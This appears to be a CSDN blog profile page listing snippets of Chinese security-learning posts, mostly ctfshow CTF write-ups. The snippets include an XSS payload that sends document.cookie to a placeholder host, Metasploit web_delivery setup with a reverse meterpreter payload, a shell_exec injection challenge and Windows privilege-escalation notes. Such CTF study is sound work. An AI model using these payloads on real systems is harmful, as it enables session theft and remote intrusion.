multi4
码龄5年
关注
提问 私信
  • 博客:138,983
    138,983
    总访问量
  • 103
    原创
  • 909,292
    排名
  • 268
    粉丝
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:江西省
  • 加入CSDN时间: 2019-11-30
博客简介:

qq_45951598的博客

查看详细资料
个人成就
  • 获得127次点赞
  • 内容获得50次评论
  • 获得633次收藏
  • 代码片获得1,473次分享
创作历程
  • 1篇
    2022年
  • 76篇
    2021年
  • 31篇
    2020年
成就勋章
TA的专栏
  • 网站搭建
    3篇
  • 安全学习
    32篇
  • web
    35篇
  • 操作系统
  • reverse
    9篇
  • 内网
    4篇
  • 语言学习
    5篇
  • 小迪安全
    1篇
  • python
    3篇
  • 其他
    1篇
  • hackTheBox
    1篇
  • java学习之路
    2篇
  • 文件上传
  • 调试
    1篇
  • 二进制
    1篇
  • misc
    6篇
  • c++
    2篇
  • 红日
    2篇
  • 模块
    1篇
  • crypto
    1篇
  • python
    2篇
  • sql注入
    1篇
兴趣领域 设置
  • 人工智能
    集成学习
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

346人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

ctfshow 其他

web396、397、398、399、400、401 parse_url 绕过源码error_reporting(0);if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']);}else{ highlight_file(__FILE__);}这里没有什么限制直接绕过payload一?url=http
原创
发布博客 2022.01.11 ·
3299 阅读 ·
0 点赞 ·
1 评论 ·
5 收藏

ctfshow_黑盒测试

文章目录WEB38WEB39web40web41WEB38payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagWEB39这里爆出了路径,直接访问获取flag。web40这里和上一题一样,但是多了一个弱密码.web41...
原创
发布博客 2021.12.22 ·
603 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

ctfshow ssti

前言开始SSTI,参考文章:参考文章flask之ssti模版注入从零到入门bfengj博客yu22x由于本人太菜了,只能先学其他大佬的博客先做题。__class__ 类的一个内置属性,表示实例对象的类。__base__ 类型对象的直接基类__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases____mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查
原创
发布博客 2021.10.15 ·
453 阅读 ·
2 点赞 ·
2 评论 ·
5 收藏

ctfshow_JWT

文章目录JWT简介WEB345JWT简介Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。JSON Web Token 入门教程JWT简要介绍
原创
发布博客 2021.10.14 ·
472 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

ctfshow XSS

收集一下可用的姿势吧,window.open:open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口。location.href=”/url” 当前页面打开URL页面windows.location.href=”/url” 当前页面打开URL页面onfocus 事件在对象获得焦点时发生autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。<script>window.open('http://ip:端口/'+document.cookie)</
原创
发布博客 2021.10.07 ·
265 阅读 ·
1 点赞 ·
0 评论 ·
1 收藏

ctfshow-phpcve

web312(CVE-2018-19518)-PHP-IMAPphp imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。影响:PHP:5.6.38系统:Debian/ubuntu
原创
发布博客 2021.10.04 ·
182 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

ctfshow- java

web279-294 296-297yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71具体用法在md文件中,例如检测python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action利用python Struts2Scan.py -u http://94c4c47
原创
发布博客 2021.08.25 ·
590 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

ctfshow_ThinkPHP专题

web569-- 路由打开页面是这样的这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册不想看的,我就简单的截取一张图片来看一下PATHINFO模式下面的URL访问地址是:http://localhost/index.php/home/user/login/var/value/然后根据提示直接构造就是了payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80
原创
发布博客 2021.07.02 ·
446 阅读 ·
0 点赞 ·
3 评论 ·
0 收藏

c语言逆向 指针逆向小案例

1、列出每一行的反汇编代码: char a = 10; mov byte ptr [a],0Ah short b = 20; mov eax,14h mov word ptr [b],ax int c = 30; mov dword ptr [c],1Eh char* pa = &a; lea eax,[a] mov dword ptr [pa],eax
原创
发布博客 2021.07.01 ·
439 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

【小迪安全学习笔记】信息收集-架构-搭建-waf等

cms识别技术
原创
发布博客 2021.06.19 ·
438 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

【小迪安全学习笔记】基础入门-系统及数据库等

前言:除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。操作系统层面识别操作系统常见方法通过网站或通过扫描相关软件识别大小写对网页都没有影响,这种情况就可以认定为windows服务器,因为windows服务器不区分大小写这个网站对应的操作系统是linux服务器也可以用TTL来判断服务器系统,相邻的值来判断ip地址可用nmap来判断操作系统 nmap -O IP简要两者区别
转载
发布博客 2021.06.19 ·
420 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

【小迪安全学习笔记】基础入门-搭建安全拓展

涉及知识:常见搭建平台脚本启用ASP,PHP,ASPX,JSP,PY,JAVAWEB等环境域名IP目录解析安全问题IP地址访问可以发现更多的信息同时经常能找到程序源码备份文件和敏感信息,而域名访问只能发现一个文件夹下的所有文件。网站搭建的时候支持IP访问和域名访问,域名访问的时候一般只会指向某个目录,IP访问的时候指向的是根目录。常见文件后缀解析对应安全指定后缀名对应某个文件,访问网站出现遇到不能解析的文件就是中间件可能默认或者添加某些设置导致解析时出现问题。常见安全测试中的安全防护学校内
原创
发布博客 2021.06.19 ·
370 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

msf windows提权方法总结

简介提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等1.getsystem这里使用getsystem命令试一下,运气好的话可能就提到了system2.bypassuac内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
原创
发布博客 2021.06.18 ·
2988 阅读 ·
3 点赞 ·
2 评论 ·
21 收藏

msf 上线方法

首先选中模块use exploit/multi/script/web_deliveryroot@kali:~# msfconsole msf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_delivery) > set payload windows/x64/meterpreter/revers
原创
发布博客 2021.06.18 ·
1225 阅读 ·
1 点赞 ·
0 评论 ·
1 收藏

c语言逆向 循环语句反汇编

do while这里do while很简单就没什么好说的了。总结:1、根据条件跳转指令所跳转到的地址,可以得到循环语句块的起始地址。2、根据条件跳转指令所在的地址,可以得到循环语句块的结束地址。while总结:1、根据条件跳转指令所跳转到的地址,可以得到循环语句块的结束地址;2、根据jmp 指令所跳转到的地址,可以得到循环语句块的起始地址;3、在还原while 比较时,条件跳转的逻辑与源码相反。for 语句的语法总结:1、第一个jmp 指令之前为赋初值部分.2、第一个jmp
原创
发布博客 2021.06.10 ·
388 阅读 ·
3 点赞 ·
2 评论 ·
4 收藏

c语言 switch反汇编

switch语句反汇编一、switch语句1、在正向编码时,switch语句可以看做是if语句的简写2、break在switch语句的妙用1、当switch存在3个分支时当去掉break的时候二、switch语句的反汇编1、当switch存在3个分支时#include<stdio.h>void Function(int x) { switch (x) { case 1: printf("1"); case 2: printf("2"); cas
原创
发布博客 2021.06.09 ·
957 阅读 ·
10 点赞 ·
6 评论 ·
16 收藏

msf 自动添加路由

use post/multi/manage/autoroute
原创
发布博客 2021.06.07 ·
1126 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

python核心编程 第4章 深入类和对象

4-1 鸭子类型和多态性什么是鸭子类型当看到一只鸟走起来像鸭子、游泳起来像鸭子、叫起来也像鸭子, 那么这只鸟就可以被称为鸭子.在下面这段代码中, 所有的类实现了同一个方法, 这些类就可以归为同一种类型, 这样在调用的时候就可以都调用say方法, 从而实现了多态, 一种接口多种实现.class Cat(object): def say(self): print("i am a cat")class Dog(object): def say(self):
原创
发布博客 2021.06.06 ·
110 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

python 魔法函数一览

字符串表示__str__如果要把一个类的实例变成 str,就需要实现特殊方法__str__():不使用__str__()方法class Student(object): def __init__(self,id,name,age): self.id=id self.name=name self.age=age s=Student(111,"Bob",18)print(s)输出结果:<main.Student object a
原创
发布博客 2021.06.06 ·
297 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

ctfshow 代码审计

web301这里看了一下文件发现,就一些登入页面文件然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计<?phperror_reporting(0);session_start();require 'conn.php';$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空$_POST['userpwd']=!empty(
原创
发布博客 2021.05.21 ·
776 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏
加载更多